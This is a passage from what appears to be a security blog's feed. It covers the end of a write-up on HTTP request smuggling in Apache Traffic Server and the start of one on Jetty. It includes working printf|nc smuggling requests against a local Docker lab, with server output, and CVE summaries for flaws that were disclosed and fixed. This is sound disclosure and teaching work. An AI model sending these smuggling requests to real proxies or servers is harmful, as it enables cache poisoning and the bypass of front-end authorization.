02 Host: dummy-host7.example.com\r\n
03 Cache-control: max-age=300\r\n
04 Content-Length: 71\r\n
05 \r\n
06 GET /index.html?cache=zorg43 HTTP/1.1\r\n
07 Host: dummy-host7.example.com\r\n
08 \r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Line &lt;strong&gt;04&lt;/strong&gt; is ignored on cache hit (only after the first run, then),
after that line &lt;strong&gt;06&lt;/strong&gt; is now a new query and not just the 1st query body.&lt;/p&gt;

&lt;p&gt;This HTTP query is valid, &lt;strong&gt;THERE IS NO invalid HTTP syntax present.&lt;/strong&gt;
So it&#39;s quite easy to perform a successful complete Smuggling attack from this issue, even using HaProxy in front of ATS.&lt;/p&gt;

&lt;p&gt;If HaProxy is configured to use a keep-alive connection to ATS we can fool the HTTP stream of HaProxy by sending a pipeline of two queries where ATS sees 3 queries:&lt;/p&gt;

&lt;h3&gt;Attack schema&lt;/h3&gt;

&lt;pre&gt;&lt;code&gt;[ATS HTTP-Splitting issue on Cache hit + GET + Content-Length]
Something        HaProxy           ATS            Nginx
    |--A-----------&amp;gt;|               |               |
    |               |--A-----------&amp;gt;|               |
    |               |               |--A-----------&amp;gt;|
    |               |            [cache]&amp;lt;--A--------|
    |               | (etc.) &amp;lt;------|               | warmup
---------------------------------------------------------
    |               |               |               | attack
    |--A(+B)+C-----&amp;gt;|               |               |
    |               |--A(+B)+C-----&amp;gt;|               |
    |               |             [HIT]             | * Bug *
    |               |&amp;lt;--A-----------|               | * B &#39;discovered&#39; *
    |&amp;lt;--A-----------|               |--B-----------&amp;gt;|
    |               |               |&amp;lt;-B------------|
    |               |&amp;lt;-B------------|               |
 [ouch]&amp;lt;-B----------|               |               | * wrong resp. *
    |               |               |--C-----------&amp;gt;|
    |               |               |&amp;lt;--C-----------|
    |              [R]&amp;lt;--C----------|               | rejected
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;First, we need to init cache, we use port 8001 to get a stream HaProxy-&gt;ATS-&gt;Nginx.&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /index.html?cache=cogip2000 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Cache-control: max-age=300\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-Length: 0\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;nc -q &lt;span class=&quot;m&quot;&gt;1&lt;/span&gt; 127.0.0.1 8001&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;You can run it two times and see that on a second time it does not reach the nginx &lt;code&gt;access.log&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Then we attack HaProxy, or any other cache set in front of this HaProxy.
We use a pipeline of &lt;strong&gt;2 queries&lt;/strong&gt;, ATS will send back &lt;strong&gt;3 responses&lt;/strong&gt;.
If a keep-alive mode is present in front of ATS there is a security problem.
Here it&#39;s the case because we do not use &lt;code&gt;option: http-close&lt;/code&gt; on HaProxy (which would prevent usage of pipelines).&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /index.html?cache=cogip2000 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Cache-control: max-age=300\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-Length: 74\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /index.html?evil=cogip2000 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /victim.html?cache=zorglub HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;nc -q &lt;span class=&quot;m&quot;&gt;1&lt;/span&gt; 127.0.0.1 8001&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Query for &lt;code&gt;/victim.html&lt;/code&gt; (should be a 404 in our example) gets response for &lt;code&gt;/index.html&lt;/code&gt; (&lt;code&gt;X-Location-echo: /index.html?evil=cogip2000&lt;/code&gt;).&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-http&quot; data-lang=&quot;http&quot;&gt;&lt;span class=&quot;kr&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;m&quot;&gt;200&lt;/span&gt; &lt;span class=&quot;ne&quot;&gt;OK&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Server&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;ATS/7.1.1&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Date&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 16:05:41 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;text/html&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Length&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;120&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Last-Modified&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 14:16:28 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;ETag&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;&amp;quot;5bd321bc-78&amp;quot;&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;X-Location-echo&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;/index.html?cache=cogip2000&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;X-Default-VH&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;0&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Cache-Control&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;public, max-age=300&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Accept-Ranges&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;bytes&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Age&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;12&lt;/span&gt;

$&lt;span class=&quot;nt&quot;&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;&lt;/span&gt;Nginx default static page&lt;span class=&quot;nt&quot;&gt;&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;body&amp;gt;&amp;lt;h1&amp;gt;&lt;/span&gt;Hello World&lt;span class=&quot;nt&quot;&gt;&amp;lt;/h1&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;p&amp;gt;&lt;/span&gt;It works!&lt;span class=&quot;nt&quot;&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;




&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-http&quot; data-lang=&quot;http&quot;&gt;&lt;span class=&quot;kr&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;m&quot;&gt;200&lt;/span&gt; &lt;span class=&quot;ne&quot;&gt;OK&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Server&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;ATS/7.1.1&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Date&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 16:05:53 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;text/html&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Length&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;120&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Last-Modified&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 14:16:28 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;ETag&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;&amp;quot;5bd321bc-78&amp;quot;&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;X-Location-echo&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;/index.html?evil=cogip2000&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;X-Default-VH&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;0&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Cache-Control&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;public, max-age=300&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Accept-Ranges&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;bytes&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Age&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;0&lt;/span&gt;

$&lt;span class=&quot;nt&quot;&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;&lt;/span&gt;Nginx default static page&lt;span class=&quot;nt&quot;&gt;&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;body&amp;gt;&amp;lt;h1&amp;gt;&lt;/span&gt;Hello World&lt;span class=&quot;nt&quot;&gt;&amp;lt;/h1&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;p&amp;gt;&lt;/span&gt;It works!&lt;span class=&quot;nt&quot;&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Here the issue is &lt;strong&gt;critical&lt;/strong&gt;, especially because &lt;strong&gt;there is not invalid syntax in the attacking query&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;We have an HTTP response splitting, this means two main impacts:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;ATS may be used to poison or hurt an actor used in front of it&lt;/li&gt;
&lt;li&gt;the second query is hidden (that&#39;s a body, binary garbage for an http actor), so any security filter set in front of ATS
cannot block the 2nd query. We could use that to hide a second layer of attack
like an ATS cache poisoning as described in the other attacks. Now that you have a working lab you can try embedding several layers of attacks...&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;That&#39;s what the &lt;strong&gt;Drain the request body if there is a cache hit&lt;/strong&gt; fix is about.&lt;/p&gt;

&lt;p&gt;Just to better understand &lt;em&gt;real world impacts&lt;/em&gt;, here the only one receiving response B instead of C is the attacker. HaProxy is not a cache, so the mix C-request/B-response on HaProxy is not a real direct threat. But if there is a cache in front of HaProxy, or if we use several chained ATS proxies...&lt;/p&gt;

&lt;h2&gt;Timeline&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;2017-12-26: Reports to project maintainers&lt;/li&gt;
&lt;li&gt;2018-01-08: Acknowledgment by project maintainers&lt;/li&gt;
&lt;li&gt;2018-04-16: Version 7.1.3 with most of the fix&lt;/li&gt;
&lt;li&gt;2018-08-04: Versions 7.1.4 and 6.2.2 (officially containing all fixs, and some other CVE fixs)&lt;/li&gt;
&lt;li&gt;2018-08-28: &lt;a href=&quot;https://lists.apache.org/thread.html/7df882eb09029a4460768a61f88a30c9c30c9dc88e9bcc6e19ba24d5@%3Cusers.trafficserver.apache.org%3E&quot;&gt;CVE announce&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;2019-10-17: This article&lt;/li&gt;
&lt;/ul&gt;


&lt;h2&gt;See also&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Video &lt;a href=&quot;https://www.youtube.com/watch?v=dVU9i5PsMPY&quot;&gt;Defcon 24: HTTP Smuggling&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Regilero-Hiding-Wookiees-In-Http.pdf&quot;&gt;Defcon support&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Video &lt;a href=&quot;https://www.youtube.com/watch?v=lY_Mf2Fv7kI&quot;&gt;Defcon demos&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
				<published>2019-10-17 00:00:00 +0200</published>
				<link>http://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/</link>
			</item>
		
			<item>
				<title>Security: HTTP Smuggling, Jetty</title>
				<description>&lt;p&gt;&lt;small&gt;&lt;strong&gt;English version&lt;/strong&gt; (&lt;strong&gt;Version Française&lt;/strong&gt; sur &lt;a href=&quot;https://www.makina-corpus.com/blog/metier/2019/contrebande-de-http-http-smuggling-jetty&quot;&gt;makina corpus&lt;/a&gt;).&lt;/small&gt;
&lt;small&gt;estimated read time: 15min&lt;/small&gt;&lt;/p&gt;

&lt;h2&gt;Jetty?&lt;/h2&gt;

&lt;p&gt;&lt;a href=&quot;http://www.eclipse.org/jetty&quot;&gt;Jetty&lt;/a&gt; is a JAVA HTTP sever, but not only, it&#39;s also for example a Java servlet server. If you do not know it I think we could compare it to Tomcat. Jetty is a very lightweight part and you can find it &lt;a href=&quot;http://www.eclipse.org/jetty/powered/powered.html&quot;&gt;in a lot of projects&lt;/a&gt;.
For the part we are concerned with it&#39;s the &lt;strong&gt;HTTP server&lt;/strong&gt; which is interesting. Subject of the day is once again HTTP Smuggling, for defects which were reported by us last year (and fixed by the project maintainer a few days after the report).&lt;/p&gt;

&lt;h2&gt;Jetty fixed versions&lt;/h2&gt;

&lt;p&gt;If you use Jetty in your projects you should ensure your version is greater than :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;9.2.x : &lt;strong&gt;9.2.25v20180606&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;9.3.x : &lt;strong&gt;9.3.24.v20180605&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;9.4.x : &lt;strong&gt;9.4.11.v20280605&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;not talking about previous versions, before the 9.x, not maintained anymore.&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;The flaws were disclosed almost one year ago, so if you still have a version older than the listed ones you should really take some time and upgrade.&lt;/p&gt;

&lt;h2&gt;The flaws (a summary)&lt;/h2&gt;

&lt;p&gt;The 3 CVEs refers to somewhat classical flaws (in this specific domain). We are talking about misinterpretation of some syntax limits. Things that should usually trigger errors, but in this case you do not have the errors.&lt;/p&gt;

&lt;p&gt;In this article I&#39;ll look more specifically at some original flaws, like the HTTP/0.9 or the truncation on chunk size attribute. But it you take a look at the CVE descriptions you can see that several other flaws were also present.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2017-7656&quot;&gt;CVE-2017-7656&lt;/a&gt; CVSS v3: 7.5 HIGH CVSS v2: 5.0 MEDIUM :&lt;/li&gt;
&lt;/ul&gt;


&lt;blockquote&gt;&lt;p&gt;In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x
(non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled
poorly. An HTTP/1 style request line (i.e. method space URI space version) that
declares a version of HTTP/0.9 was accepted and treated as a 0.9 request.
If deployed behind an intermediary that also accepted and passed through the 0.9
version (but did not act on it), then the response sent could be interpreted by
the intermediary as HTTP/1 headers. This could be used to poison the cache if the
server allowed the origin client to generate arbitrary content in the response.&lt;/p&gt;&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2017-7657&quot;&gt;CVE-2017-7657&lt;/a&gt; CVSS v3: 7.5 HIGH CVSS v2: 5.0 MEDIUM :&lt;/li&gt;
&lt;/ul&gt;


&lt;blockquote&gt;&lt;p&gt;In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x
(non-default configuration with RFC2616 compliance enabled), transfer-encoding
chunks are handled poorly. The chunk length parsing was vulnerable to an integer
overflow. Thus a large chunk size could be interpreted as a smaller chunk size and
content sent as chunk body could be interpreted as a pipelined request. If Jetty
was deployed behind an intermediary that imposed some authorization and that
intermediary allowed arbitrarily large chunks to be passed on unchanged, then this
flaw could be used to bypass the authorization imposed by the intermediary as the
fake pipelined request would not be interpreted by the intermediary as a request.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;If you previously read some of my HTTP smuggling posts this is quite classical, you&#39;ll note the authentication bypass which is only one of the various attacks that smuggling allows, but for a chunk size number truncation it may be the only type of exploitation available.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2017-7658&quot;&gt;CVE-2017-7658&lt;/a&gt; CVSS v3: 9.8 CRITICAL CVSS v2: 7.5 HIGH :&lt;/li&gt;
&lt;/ul&gt;


&lt;blockquote&gt;&lt;p&gt;In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x
configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two
content-lengths headers, Jetty ignored the second. When presented with a
content-length and a chunked encoding header, the content-length was ignored
(as per RFC 2616). If an intermediary decided on the shorter length, but still
passed on the longer body, then body content could be interpreted by Jetty as a
pipelined request. If the intermediary was imposing authorization, the fake
pipelined request would bypass that authorization.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;You can see that&#39;s this is the &lt;strong&gt;more severe flaw&lt;/strong&gt; in terms of security. But it&#39;s somewhat classical. We&#39;ll certainly find details about this type of attacks on future posts so I wont talk too much about that. This is the oldest flaws (first public work dating 2005) about multiple headers interpreted diffently by various actors. The modern RFC for HTTP expect rejection of such messages.&lt;/p&gt;

&lt;h2&gt;Building a test lab&lt;/h2&gt;

&lt;p&gt;If you want to see the bugs you need some old versions of Jetty, and you need to perform HTTP request on that with netcat + printf commands as shown below. To build this lab the simpliest method is Docker.&lt;/p&gt;

&lt;p&gt;Here is a working Dockerfile :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;FROM jetty:9.4.9
RUN mkdir /var/lib/jetty/webapps/root
RUN bash -c &#39;set -ex \
  &amp;amp;&amp;amp; cd /var/lib/jetty/webapps/root \
  &amp;amp;&amp;amp; wget https://tomcat.apache.org/tomcat-7.0-doc/appdev/sample/sample.war \
  &amp;amp;&amp;amp; unzip sample.war&#39;
EXPOSE 8080
ENTRYPOINT [&quot;/docker-entrypoint.sh&quot;]
CMD [&quot;java&quot;,&quot;-jar&quot;,&quot;/usr/local/jetty/start.jar&quot;]
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Let&#39;s build it an run it, go in the folder containing the previous Dockerfile :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;bash&quot;&gt;docker build -t jetty9_4_9 .
docker run --name dockerjetty9_4_9 -p 8994:8080 -d jetty9_4_9
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;You should obtain this:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;bash&quot;&gt;$ docker ps
CONTAINER ID        IMAGE               COMMAND                     CREATED             STATUS              PORTS                    NAMES
aa59d97778f1        jetty9_4_9          &quot;/docker-entrypoint(...)&quot;   3 seconds ago       Up 2 seconds        0.0.0.0:8994-&amp;gt;8080/tcp   dockerjetty9_4_9
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;You Jetty is available on 127.0.0.1:8994&lt;/p&gt;

&lt;h2&gt;Interesting details&lt;/h2&gt;

&lt;p&gt;I&#39;ll skip the small details on spacing and pseudo-spacing errors on request start, special characters allowed on the wrong places, etc. Let&#39;s look at the really &lt;em&gt;funny&lt;/em&gt; stuff.&lt;/p&gt;

&lt;h3&gt;HTTP/0.9&lt;/h3&gt;

&lt;p&gt;HTTP 0.9 syntax is  :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /path/to/resource\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;There is &lt;strong&gt;no&lt;/strong&gt; protocol version as in :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /path/to/resource HTTP/0.9\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Et we should &lt;strong&gt;not&lt;/strong&gt; have headers after this first line as in :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /path/to/resource HTTP/0.9\r\n
Range: bytes=5-18\r\n
\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;An HTTP/0.9 response does not contain any meta-information (no header, no content-type, no size).&lt;/p&gt;

&lt;p&gt;In jetty there is normally no support for request in 0.9  version. You can make a test on you docker (which is listening on port 8994), typing &lt;code&gt;printf &#39;GET /?test=4564\r\n&#39;|nc -q 1 127.0.0.1 8994\r\n&lt;/code&gt; (you need nc, also named netcat).&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ printf &#39;GET /?test=4564\r\n&#39;\
&amp;gt; |nc -q 1 127.0.0.1 8994
HTTP/1.1 400 HTTP/0.9 not supported
Content-Type: text/html;charset=iso-8859-1
Content-Length: 65
Connection: close
Server: Jetty(9.4.9.v20180320)

&amp;lt;h1&amp;gt;Bad Message 400&amp;lt;/h1&amp;gt;&amp;lt;pre&amp;gt;reason: HTTP/0.9 not supported&amp;lt;/pre&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;If you redo another test leb with a Jetty 9.2 you&#39;ll see that we still had support for HTTP 0.9 using a valid syntax.&lt;/p&gt;

&lt;p&gt;Until now no problem. But let&#39;s add a part with protocol declaration in our line with &lt;code&gt;HTTP/0.9&lt;/code&gt;, which is forbidden :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;printf &#39;GET /?test=4564 HTTP/0.9\r\n&#39;\
&#39;\r\n&#39;\
|nc -q 1 127.0.0.1 8994&amp;lt;html&amp;gt;

&amp;lt;head&amp;gt;
&amp;lt;title&amp;gt;Sample &quot;Hello, World&quot; Application&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body bgcolor=white&amp;gt;

&amp;lt;table border=&quot;0&quot;&amp;gt;
&amp;lt;tr&amp;gt;
(...)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Here Jetty is responding with a 0.9 response, &lt;strong&gt;no headers&lt;/strong&gt;, just a body.&lt;/p&gt;

&lt;p&gt;We are starting to have some &lt;strong&gt;security problems&lt;/strong&gt;. An actor present in the HTTP transmission chain will not consider &lt;code&gt;HTTP/0.9&lt;/code&gt; as a valid HTTP v0.9 syntax and could read the response as an HTTP/1.0 or HTTP/1.1 response.&lt;/p&gt;

&lt;p&gt;Let&#39;s add another problem which renders this pseudo support really ... problematic, &lt;strong&gt;headers from the request are read and interpreted&lt;/strong&gt;. They should not, there&#39;re no headers in v0.9.&lt;/p&gt;

&lt;p&gt;We add a &lt;code&gt;range&lt;/code&gt; header to check if the requets can extract any subpart of the response :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;printf &#39;GET /?test=4564 HTTP/0.9\r\n&#39;\
&#39;Range: bytes=36-42\r\n&#39;\
&#39;\r\n&#39;\
|nc -q 1 127.0.0.1 8994

, World
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;Victory&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;This means we can use a request which is not officially an HTTP/0.9 request (as we have a wrong protocol version &lt;code&gt;HTTP/0.9&lt;/code&gt; part inside), with header support, and that we can choose quite easily the part of the response that will be returned, without headers added by the HTTP server. The idea beside this, to exploit the flaws, is to extract a fake HTTP/1.0 or HTTP/1.1 response, hidden for example in an image.&lt;/p&gt;

&lt;p&gt;If an invalid HTTP/0.9 request is sent through a Reverse Proxy (which does not detect it as an 0.9 query), the response could be interpreted as a valid HTTP/1.1 response if the response content looks like HTTP/1.1 protocol.&lt;/p&gt;

&lt;p&gt;You can hide a complete HTTP response (headers + body) in the EXIF data of an image, extract this section with a range query, and use this data chunk as a valid HTTP/1.1 response. If you look at the second example in &lt;a href=&quot;https://www.youtube.com/watch?v=lY_Mf2Fv7kI&quot;&gt;this video&lt;/a&gt; it was the effect obtained on golaong. You&#39;ll just need the ability to upload the file containing this response on the server, and a Reverse proxy  support this HTTP/0.9.&lt;/p&gt;

&lt;h3&gt;Double Content-Length&lt;/h3&gt;

&lt;p&gt;We&#39;ll do it fast, this is a request splitting attack, in some specific configurations you can obtain two answers by doubling the Content-Length header. Doubling it is strictly forbidden, because when you do it we cannot known which header is the right one to read to evaluate the body size, it depends on the actor interpreting the HTTP stream.&lt;/p&gt;

&lt;p&gt;First problem, on version 9.2 it was still allowed to use two &quot;Content-Length&quot; headers. On versions 9.3 and 9.4 it was harder, but if the &lt;strong&gt;first header value is 0&lt;/strong&gt; this was still allowed.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;Rejected:
    Content-Length: 200\r\n
    Content-Length: 99\r\n
Rejected:
    Content-Length: 200\r\n
    Content-Length: 200\r\n
Rejected:
    Content-Length: 0\r\n
    Content-Length: 200\r\n
    Content-Length: 0\r\n
Rejected:
    Content-Length: 0\r\n
    Content-Length: 99\r\n
    Content-Length: 200\r\n
Rejected:
    Content-Length: 200\r\n
    Content-Length: 0\r\n
Accepted:
    Content-Length: 0\r\n
    Content-Length: 200\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Exemple in the lab:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;bash&quot;&gt;printf &#39;GET /?test=4966 HTTP/1.1\r\n&#39;\
